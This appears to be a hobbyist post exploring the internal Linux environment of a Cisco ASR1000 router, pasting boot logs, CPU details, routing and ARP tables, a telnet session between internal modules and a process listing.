ACPI: PCI Interrupt 0000:00:1f.2[B] -> GSI 19 (level, low) -> IRQ 201
PCI: Setting latency timer of device 0000:00:1f.2 to 64
ahci 0000:00:1f.2: AHCI 0001.0200 32 slots 4 ports 3 Gbps 0xf impl SATA mode
ahci 0000:00:1f.2: flags: 64bit ncq ilck stag pm led clo pio slum part
ata1: SATA max UDMA/133 cmd 0xFFFFC2000001C100 ctl 0x0 bmdma 0x0 irq 209
ata2: SATA max UDMA/133 cmd 0xFFFFC2000001C180 ctl 0x0 bmdma 0x0 irq 209
ata3: SATA max UDMA/133 cmd 0xFFFFC2000001C200 ctl 0x0 bmdma 0x0 irq 209
ata4: SATA max UDMA/133 cmd 0xFFFFC2000001C280 ctl 0x0 bmdma 0x0 irq 209
scsi0 : ahci
ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
ata1.00: ATA-7, max UDMA/133, 156301488 sectors: LBA48 NCQ (depth 31/32)
ata1.00: configured for UDMA/133
scsi1 : ahci
ata2: SATA link down (SStatus 0 SControl 300)
scsi2 : ahci
ata3: SATA link down (SStatus 0 SControl 300)
scsi3 : ahci
ata4: SATA link down (SStatus 0 SControl 300)
Vendor: <7>A<7>T<7>A<7> <7> <7> <7> <7> <7> Model: <7>S<7>T<7>9<7>8<7>0<7>8<7>1<7>8<7>S<7>M<7> <7> <7> <7> <7> <7> <7> Rev: <7>3<7>.<7>A<7>A<7>
Type: Direct-Access <7> ANSI SCSI revision: 05<7>
SCSI device sda: 156301488 512-byte hdwr sectors (80026 MB)
sda: Write Protect is off
sda: Mode Sense: 00 3a 00 00
SCSI device sda: drive cache: write back
SCSI device sda: 156301488 512-byte hdwr sectors (80026 MB)
sda: Write Protect is off
sda: Mode Sense: 00 3a 00 00
SCSI device sda: drive cache: write back
sda: sda1 sda2 sda3
sd 0:0:0:0: Attached scsi disk sda
sd 0:0:0:0: Attached scsi generic sg0 type 0
PCI: Enabling device 0000:00:1a.7 (0000 -> 0002)
GSI 18 sharing vector 0xD9 and IRQ 18
ACPI: PCI Interrupt 0000:00:1a.7[C] -> GSI 18 (level, low) -> IRQ 217
PCI: Setting latency timer of device 0000:00:1a.7 to 64
ehci_hcd 0000:00:1a.7: EHCI Host Controller
ehci_hcd 0000:00:1a.7: new USB bus registered, assigned bus number 1
ehci_hcd 0000:00:1a.7: debug port 1
PCI: cache line size of 32 is not supported by device 0000:00:1a.7
ehci_hcd 0000:00:1a.7: irq 217, io mem 0xcc226c00
ehci_hcd 0000:00:1a.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 6 ports detected
PCI: Enabling device 0000:00:1d.7 (0000 -> 0002)
GSI 19 sharing vector 0xE1 and IRQ 19
ACPI: PCI Interrupt 0000:00:1d.7[A] -> GSI 23 (level, low) -> IRQ 225
PCI: Setting latency timer of device 0000:00:1d.7 to 64
ehci_hcd 0000:00:1d.7: EHCI Host Controller
ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 2
ehci_hcd 0000:00:1d.7: debug port 1
PCI: cache line size of 32 is not supported by device 0000:00:1d.7
ehci_hcd 0000:00:1d.7: irq 225, io mem 0xcc226800
usb 1-2: new high speed USB device using ehci_hcd and address 2
ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004
usb usb2: configuration #1 chosen from 1 choice
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 6 ports detected
usb 1-2: configuration #1 chosen from 1 choice
Initializing USB Mass Storage driver...
scsi4 : SCSI emulation for USB Mass Storage devices
usb-storage: device found at 2
usbcore: registered new driver usb-storage
USB Mass Storage support registered.
usb-storage: waiting for device to settle before scanning
usbcore: registered new driver libusual
oprofile: using NMI interrupt.
TCP bic registered
Initializing IPsec netlink socket
NET: Registered protocol family 1
NET: Registered protocol family 17
ACPI: (supports S0 S1 S3 S4 S5)
Freeing unused kernel memory: 5188k freed
Write protecting the kernel read-only data: 917k
e1000e: Intel(R) PRO/1000 Network Driver - 0.4.1.7-NAPI
e1000e: Copyright (c) 1999-2008 Intel Corporation.
PCI: Enabling device 0000:00:19.0 (0000 -> 0003)
GSI 20 sharing vector 0xE9 and IRQ 20
ACPI: PCI Interrupt 0000:00:19.0[A] -> GSI 20 (level, low) -> IRQ 233
PCI: Setting latency timer of device 0000:00:19.0 to 64
iTCO_wdt: Intel TCO WatchDog Timer Driver v1.03 (30-Apr-2008)
iTCO_wdt: Enabling WDT ISR from init.
iTCO_wdt: Found a ICH9R TCO device (Version=2, TCOBASE=0x0460)
iTCO_wdt: initialized. heartbeat=120 sec (nowayout=0)
0000:00:19.0: eth0: (PCI Express:2.5GB/s:Width x1) 88:88:88:88:87:88
0000:00:19.0: eth0: Intel(R) PRO/1000 Network Connection
0000:00:19.0: eth0: MAC: 7, PHY: 8, PBA No: ffffff-0ff
PCI: Enabling device 0000:03:00.0 (0000 -> 0003)
ACPI: PCI Interrupt 0000:03:00.0[A] -> GSI 16 (level, low) -> IRQ 169
PCI: Setting latency timer of device 0000:03:00.0 to 64
0000:03:00.0: eth1: (PCI Express:2.5GB/s:Width x4) 00:11:22:33:44:55
0000:03:00.0: eth1: Intel(R) PRO/1000 Network Connection
0000:03:00.0: eth1: MAC: 1, PHY: 1, PBA No: ffffff-0ff
PCI: Enabling device 0000:03:00.1 (0000 -> 0003)
GSI 21 sharing vector 0x42 and IRQ 21
ACPI: PCI Interrupt 0000:03:00.1[B] -> GSI 17 (level, low) -> IRQ 66
PCI: Setting latency timer of device 0000:03:00.1 to 64
0000:03:00.1: eth2: (PCI Express:2.5GB/s:Width x4) 00:11:22:33:44:54
0000:03:00.1: eth2: Intel(R) PRO/1000 Network Connection
0000:03:00.1: eth2: MAC: 1, PHY: 1, PBA No: ffffff-0ff
ACPI: PCI Interrupt 0000:00:1f.3[C] -> GSI 18 (level, low) -> IRQ 217
GSI 22 sharing vector 0x52 and IRQ 22
GSI 23 sharing vector 0x5A and IRQ 23
cpld_driver: cp_board_type = BADDACE5
cpld_driver: mstp_subtype = 2
rmonbifo_mod: module license 'Proprietary' taints kernel.
rmonbifo.ko loaded. 0.0.3 Date Nov 4 2009 21:54:34
Copyright (c) 2005-2009 by Cisco Systems, Inc.
piso.o loaded. 0.0.2 Date Nov 4 2009 21:54:33
Copyright (c) 2006-2007 by cisco Systems, Inc.
Freeing initrd memory: 220296k freed
ISO 9660 Extensions: RRIP_1991A
Vendor: <7>S<7>M<7>A<7>R<7>T<7> <7> <7> <7> Model: <7>e<7>U<7>S<7>B<7> <7> <7> <7> <7> <7> <7> <7> <7> <7> <7> <7> <7> Rev: <7>A<7>1<7>1<7>0<7>
Type: Direct-Access <7> ANSI SCSI revision: 00<7>
SCSI device sdb: 4014080 512-byte hdwr sectors (2055 MB)
sdb: Write Protect is off
sdb: Mode Sense: 43 00 00 00
sdb: assuming drive cache: write through
SCSI device sdb: 4014080 512-byte hdwr sectors (2055 MB)
sdb: Write Protect is off
sdb: Mode Sense: 43 00 00 00
sdb: assuming drive cache: write through
sdb: sdb1 sdb2 sdb3 sdb4
sd 4:0:0:0: Attached scsi disk sdb
sd 4:0:0:0: Attached scsi generic sg1 type 0
usb-storage: device scan complete
iTCO_wdt: NMIs are not routed to SMIs
iTCO_wdt: device started at time 4294698716
iTCO_wdt: Unexpected close, not stopping watchdog!
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ip_tables: (C) 2000-2006 Netfilter Core Team
ip_conntrack version 2.4 (8192 buckets, 65536 max) - 280 bytes per conntrack
0000:03:00.0: eth0: Link is Up 1000 Mbps Full Duplex, Flow Control: RX/TX
0000:03:00.1: eth1: Link is Up 1000 Mbps Full Duplex, Flow Control: RX/TX
Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
iTCO_wdt: device started at time 4294713770
iTCO_wdt: Unexpected close, not stopping watchdog!
lsmpi: instance 0 lsmpi_area at 0xffff810275000000 (phys 0x27fd3e000)
lsmpi: instance 1 lsmpi_area at 0xffff810274000000 (phys 0x27fcfe000)
lsmpi version 0.2.2
PCI: Enabling device 0000:01:00.0 (0000 -> 0002)
ACPI: PCI Interrupt 0000:01:00.0[A] -> GSI 16 (level, low) -> IRQ 169
pcie_ht_fpga: wrote 4000 to my bridge @ 0x22C
PCI: Setting latency timer of device 0000:01:00.0 to 64
pcie_ht_fpga: fpga_reg_start=c0000000 fpga_reg_len=20000
pcie_ht_fpga: scooby_reg_start=80000000 scooby_reg_len=40000000
pcie_ht_fpga: scooby_tdfifo_start=c0020000 scooby_tdfifo_len=1000
pcie_ht_fpga: rev reg=08112501
pcie_ht_fpga: HT ID=74541022
pcie_ht_fpga: HT CmdStat=00100007
pcie_ht_fpga: Scooby HT ID=74541022
pcie_ht_fpga: Scooby HT CmdStat=00100000
pcie_ht_fpga: Switching HT bus to 500MHz
pcie_ht_fpga: 1 HT LinkFreq=003f0323
pcie_ht_fpga: 1 Scooby HT LinkFreq=001d0323
pcie_ht_fpga: 2 HT LinkFreq=003f0323
pcie_ht_fpga: 2 Scooby HT LinkFreq=001d0323
pcie_ht_fpga: HT LinkFreq=003f0323
pcie_ht_fpga: Scooby HT LinkFreq=001d0323
pcie_ht_fpga: HT BAR0=00000004
pcie_ht_fpga: HT BAR1=00000000
pcie_ht_fpga: Scooby HT BAR0=80000004
pcie_ht_fpga: Scooby HT BAR1=00000000
pcie_ht_fpga: Scooby HT BAR2=c0020004
pcie_ht_fpga: Scooby HT BAR3=00000000
pcie_ht_fpga: MSI interrupt test succeeded
i2c /dev entries driver
Initializing coretemp
coretemp: Unknown CPU, 17
coretemp coretemp.0: This driver uses undocumented features of Core CPU (Intel will not disclose the information to individuals). Temperature might be wrong!
coretemp: Unknown CPU, 17
coretemp coretemp.1: This driver uses undocumented features of Core CPU (Intel will not disclose the information to individuals). Temperature might be wrong!
DDR: LOADING DRIVER
hts.o htdp loaded. 0.0.13 Date Nov 4 2009 21:54:23
Copyright (c) 2006-2009 by cisco Systems, Inc. All rights reserved
hts: mcp-rp sets hts_type to Scooby.
hts.ko: sysctl ffff81025deb4bc0
ich9_spi: Loading driver
ich9_spi: Found ATMEL_25DF321 SPI serial flash, size 4096KB
cmdlinepart partition parsing not available
ich9_spi: ICH9 Device ID 2916
hts: ERROR: lsmpi tx -NO indication
hts_cfg_init() 1: scby_pn=7b2245
hts_cfg_init() 2: scby_pn=45227b00
hts_cfg_init() 3: scby_pn=45227b00
hts_cfg_init() 4: scby_pn=7b2245
hts: hts_hw_init() Initialization of hardware done.
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
iTCO_wdt: device started at time 4294723805
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294728062
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294733814
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294734312
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294741440
lsmpi_open: device opened by pid 21480 instance 0
lsmpi_vopen: vma 0xffff81022db86a28 region #1 mapped for instance 0
lsmpi_vopen: vma 0xffff81022db86ad8 region #2 mapped for instance 0
lsmpi_vopen: vma 0xffff81022db86298 region #3 mapped for instance 0
lsmpi_vopen: vma 0xffff81022db86348 region #4 mapped for instance 0
LSMPI: Register dual stack diverter
lsmpi_vopen: vma 0xffff81022db86818 region #5 mapped for instance 0
device liin entered promiscuous mode
device liin left promiscuous mode
ifconfig[12471]: segfault at 0000000092f7f1ef rip 0000000092f7f1ef rsp 00000000ff87d38c error 14
device liin entered promiscuous mode
device liin left promiscuous mode


Get the RP CPU details:


[ASR1k_RP_0:/]$ cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU L5238 @ 2.66GHz
stepping : 6
cpu MHz : 2664.000
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm syscall nx lm constant_tsc pni monitor ds_cpl vmx est tm2 cx16 xtpr lahf_lm
bogomips : 5323.64
clflush size : 64
cache_alignment : 64
address sizes : 38 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU L5238 @ 2.66GHz
stepping : 6
cpu MHz : 2664.000
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm syscall nx lm constant_tsc pni monitor ds_cpl vmx est tm2 cx16 xtpr lahf_lm
bogomips : 5319.97
clflush size : 64
cache_alignment : 64
address sizes : 38 bits physical, 48 bits virtual
power management:


Print the kernel IP routing table:


[ASR1k_RP_0:/]$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.2.0.0 * 255.255.0.0 U 0 0 0 eth0
10.3.0.0 * 255.255.0.0 U 0 0 0 eth1
10.0.0.0 * 255.255.0.0 U 0 0 0 eth0
10.1.0.0 * 255.255.0.0 U 0 0 0 eth1
192.168.0.0 * 255.255.255.252 U 0 0 0 liin


Check the other modules' internal IPs:


[ASR1k_RP_0:/]$ arp -a
cc1-0 (10.0.3.1) at 00:00:03:01:00:00 [ether] on eth0
fp-standby (10.2.0.4) at 00:00:02:01:00:00 [ether] on eth0
rp1-1 (10.1.1.1) at 00:00:01:01:00:01 [ether] on eth1
cc1 (10.2.0.101) at 00:00:03:01:00:00 [ether] on eth0
fp0-0 (10.0.2.0) at 00:00:02:00:00:00 [ether] on eth0
rp1-0 (10.0.1.1) at 00:00:01:01:00:00 [ether] on eth0
fp-active (10.2.0.3) at 00:00:02:00:00:00 [ether] on eth0
fp1-0 (10.0.2.1) at 00:00:02:01:00:00 [ether] on eth0


Telnet to one of the other modules (you can also open a shell directly from IOS):


[ASR1k_RP_0:/]$ telnet 10.0.2.0
Trying 10.0.2.0...
Connected to 10.0.2.0.
Escape character is '^]'.

Linux 2.6.18.8 (ASR1k_ESP_0) (ttyp0)

2010/02/01 10:46:46 :

[ASR1k_ESP_0:/]$ ps -elF
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
4 S root 1 0 0 80 0 - 533 select Jan19 ? 00:00:13 init [3]
1 S root 2 1 0 99 19 - 0 ksofti Jan19 ? 00:00:00 [ksoftirqd/0]
5 S root 3 1 0 75 -5 - 0 worker Jan19 ? 00:00:01 [events/0]
1 S root 4 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [khelper]
1 S root 5 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kthread]
1 S root 21 5 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kblockd/0]
1 S root 25 5 0 75 -5 - 0 hub_th Jan19 ? 00:00:00 [khubd]
1 S root 60 5 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 61 5 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 62 5 0 75 -5 - 0 kswapd Jan19 ? 00:00:00 [kswapd0]
1 S root 63 5 0 75 -5 - 0 worker Jan19 ? 00:00:00 [aio/0]
1 S root 626 1 0 80 0 - 0 mtd_bl Jan19 ? 00:00:00 [mtdblockd]
1 S root 1361 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop0]
5 S bin 1395 1 0 80 0 - 555 sys_po Jan19 ? 00:00:03 portmap
1 S root 1434 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop1]
5 S root 2127 1 0 76 -4 - 528 select Jan19 ? 00:00:00 /sbin/udevd -d
1 S root 2817 1 0 90 10 - 0 jffs2_ Jan19 ? 00:00:00 [jffs2_gcd_mtd1]
5 S root 3110 1 0 80 0 - 467 syslog Jan19 ? 00:00:00 klogd -2
5 S root 3210 1 0 80 0 - 632 sys_po Jan19 ? 00:00:08 /usr/sbin/automount --timeout=60 /misc1 file /etc/auto.misc
5 S root 3225 1 0 80 0 - 864 select Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
5 S root 3227 1 0 80 0 - 864 select Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd_telnetd.pid -f /etc/xinetd_telnetd.conf
1 R root 3413 1 0 80 0 - 0 - Jan19 ? 00:01:47 [cavium]
4 S root 3956 1 0 80 0 - 1024 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pvp.sh
0 S root 3991 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f pvp -p /tmp/fp/trace/fifo/pvp_sh%fp_0_0_3956_fifo
0 S root 4086 3956 0 80 0 - 508 select Jan19 ? 00:00:00 inotifywait -m --format %w,%-e,%f -e DELETE -e CREATE /tmp/fp/pvp/control /tmp/fp/pvp/process /tmp/fp/chasfs/pman
4 S root 4137 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 4197 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/btrace_rotate_sh_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4137_fifo
0 S root 4208 1 0 80 0 - 465 read_c Jan19 ttyS0 00:00:00 /sbin/agetty -h console 9600 vt102
0 S root 4209 1 0 80 0 - 785 wait Jan19 ? 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
4 S root 4211 1 0 80 0 - 1201 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/issu_switchover.sh
4 S root 4212 1 0 80 0 - 860 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/oom.sh
0 S root 4222 4209 0 80 0 - 864 select Jan19 ? 00:00:00 /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
4 S root 4249 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 4297 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f oom -p /tmp/fp/trace/fifo/oom_sh%fp_0_0_4212_fifo
1 S root 4328 4212 0 80 0 - 864 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/oom.sh
0 S root 4354 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f inst_issu_switchover -p /tmp/fp/trace/fifo/issu_switchover_sh%fp_0_0_4211_fifo
0 S root 4361 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cman_fp_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4249_fifo
4 S root 4423 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
4 R root 4498 4249 0 80 0 - 6583 - Jan19 ? 00:36:34 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/cman_fp
0 S root 4548 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_cdm_svr_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4423_fifo
4 S root 4622 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
4 S root 4674 4137 0 80 0 - 941 wait Jan19 ? 00:06:19 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/btrace_rotate.sh -f fp -s /tmp/fp/trace/stage -w /tmp/fp/trace -n 25 -t /tmp/rp/trace/stage
0 S root 4758 4423 0 80 0 - 93715 select Jan19 ? 00:00:00 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_cdm_svr -R
0 S root 4780 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_cp_svr_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4622_fifo
0 S root 4792 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f btrace_rotate_sh -p /tmp/fp/trace/fifo/btrace_rotate_sh%fp_0_0_4674_fifo
4 S root 4824 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 4912 4622 14 80 0 - 163527 select Jan19 ? 1-21:51:02 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_cp_svr -R
0 S root 4926 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_driver_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4824_fifo
4 S root 4961 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5028 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_ha_top_level_server_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4961_fifo
4 S root 5092 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5111 4211 0 80 0 - 507 select Jan19 ? 00:00:00 inotifywait -e moved_to /tmp/fp/chasfs/mastership
0 S root 5139 4824 2 80 0 - 95188 select Jan19 ? 07:07:13 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_driver -n0 -R -p 0
0 S root 5181 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_sp_svr_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5092_fifo
4 S root 5225 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5358 5092 0 80 0 - 111174 select Jan19 ? 00:12:32 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_sp_svr -R
0 S root 5379 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/emd_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5225_fifo
0 S root 5425 4961 0 80 0 - 94367 select Jan19 ? 00:00:31 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_ha_top_level_server 5
4 S root 5439 3956 0 69 -11 - 1015 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5539 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/fman_fp_image_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5439_fifo
4 S root 5573 5225 0 80 0 - 4763 select Jan19 ? 00:08:16 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/emd
4 S root 5604 3956 0 69 -11 - 1015 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
4 R root 5655 5439 8 80 0 - 171600 - Jan19 ? 1-03:29:15 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/fman_fp_image
0 S root 5710 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/hman_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5604_fifo
4 S root 5740 3956 0 69 -11 - 1015 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5827 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/plogd_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5740_fifo
4 S root 5923 5604 0 80 0 - 4059 select Jan19 ? 00:15:26 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/hman
0 S root 5967 5740 0 80 0 - 3911 select Jan19 ? 00:00:11 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/plogd
4 S root 15571 1 0 80 0 - 763 hrtime 11:55 ? 00:00:00 /usr/bin/sntp -a -x 6 -l /var/lock/subsys/sntp.lock -f /var/lock/subsys/sntp.state rp-active
1 S root 16914 5 0 75 -5 - 0 worker 12:05 ? 00:00:00 [rpciod/0]
1 S root 16915 1 0 80 0 - 0 svc_re 12:05 ? 00:00:00 [lockd]
4 S root 17058 4222 0 80 0 - 940 wait 12:05 ? 00:00:00 /bin/bash /usr/binos/conf/in.telnetd.sh -L /usr/binos/conf/brelay.sh
4 S root 17121 17058 0 80 0 - 2224 select 12:05 ? 00:00:00 in.telnetd: rp0-0
0 S root 17122 17121 0 80 0 - 940 wait 12:05 ttyp0 00:00:00 /bin/bash /usr/binos/conf/brelay.sh -h rp0-0 -p
4 S binos 17185 17122 0 80 0 - 920 wait 12:05 ttyp0 00:00:00 /bin/sh /usr/binos/conf/bexec.sh -c /usr/binos/conf/mcp_record_shell.sh -e BINOS_USER_NAME=?BINOS_USER_TTY=vty 0?BINOS_USER_UI_CLIENT=ios?
0 S binos 17188 17185 0 80 0 - 913 wait 12:05 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/binos/conf/bexecute.sh -c /usr/binos/conf/mcp_record_shell.sh
4 S root 17189 17188 0 80 0 - 894 wait 12:05 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_record_shell.sh
0 S root 17201 17189 0 80 0 - 511 read_c 12:05 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_F0.log.20100201120551
1 S root 17202 17201 0 80 0 - 519 read_c 12:05 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_F0.log.20100201120551
0 S root 17203 17202 0 80 0 - 800 wait 12:05 ttyp1 00:00:00 bash -i
0 S root 17380 4674 0 80 0 - 507 select 12:06 ? 00:00:00 inotifywait -t 60 -q -q /tmp/fp/trace/stage
0 S root 17383 4328 0 80 0 - 791 hrtime 12:06 ? 00:00:00 sleep 100
4 R root 17384 17203 0 80 0 - 794 - 12:06 ttyp1 00:00:00 ps -elf


Get the ESP CPU details (seems like a PowerQUICC III):


[ASR1k_ESP_0:/]$ cat /proc/cpuinfo
processor : 0
cpu : e500v2
revision : 2.0 (pvr 8021 0020)
bogomips : 1196.03
chipset : 854xH-rev2
Vendor : Freescale Semiconductor
Machine : mpc854xH-rev2ads
clock : 1200MHz
PVR : 0x80210020
SVR : 0x80390020
PLL setting : 0x6
Memory : 4031 MB
bdec cnt : 0
bdec : 0
bdec tbu : 0
bdec tbl : 0


Anyone know a way to get the QFP details?

Check the FP kernel messages:


[ASR1k_ESP_0:/]$ dmesg

SPRN_SVR is .. 3ff value 80390020
MCP processor type: 854xH-rev2 indx 3 mask ffff00f0 id 80390020 cur_ppc_sys_spec c02d4750
bootparam mstpbtp = 00000000
bootparam mstpPHY = 00000000
ASR1000: memory start: 00000000 size: 100000000
returning fbf00000
MCP: total_memory: fix fbf00000 max mem 0
Memory CAM mapping: CAM0=256Mb, CAM1=256Mb, CAM2=256Mb residual: 3263Mb
MCP: set_phys_avail: current total 30000000
Reserving init RAM from 00981000 for size 00fb8336
Reserving boot image from 00800000 - 00181000
mem_pieces_remove: bad overlap [fb9000,366d000) with [37a000, 7e0000) [fba336, 30000000)
ASR1000: removed 026b4000 from 00fb9000 virt c0fb9000 for isord
Linux version 2.6.18.8 (mcpre@mcp-bld-lnx-113) (gcc version 4.2.1) #1 Wed Nov 4 21:30:04 PST 2009
ioremap: return fdfff000 - virt fdfff000 phys 80000000 size 1000 flags 829d
ioremap: return fdffe000 - virt fdffe000 phys fbfe0000 size 1000 flags 829d
MCP:bdtype 20 20 subtype 2 mstp_svr 80390020 mask f0 != 10
ioremap: return fdefe000 - virt fdefe000 phys 81000000 size 100000 flags 829d
mcp_ccfp_reset() removed
mcp: FP FpRstCntrl reset scooby
ioremap: return fdefd000 - virt fdefd000 phys fbf00000 size 1000 flags 829d
MCP mcp85xx_setup_hose(): FP early mod lawar4 8000000c
MCP mpc85xx_setup_hose() ht_type = 2 pci_type = 8001
MCP mpc85xx_setup_hose() pci_type = 8001
mpc85xx_setup_hose pci
ioremap: return fdefc000 - virt fdefc000 phys fbf08000 size 1000 flags 829d
ioremap: return fdefb000 - virt fdefb000 phys fbf08000 size 1000 flags 829d
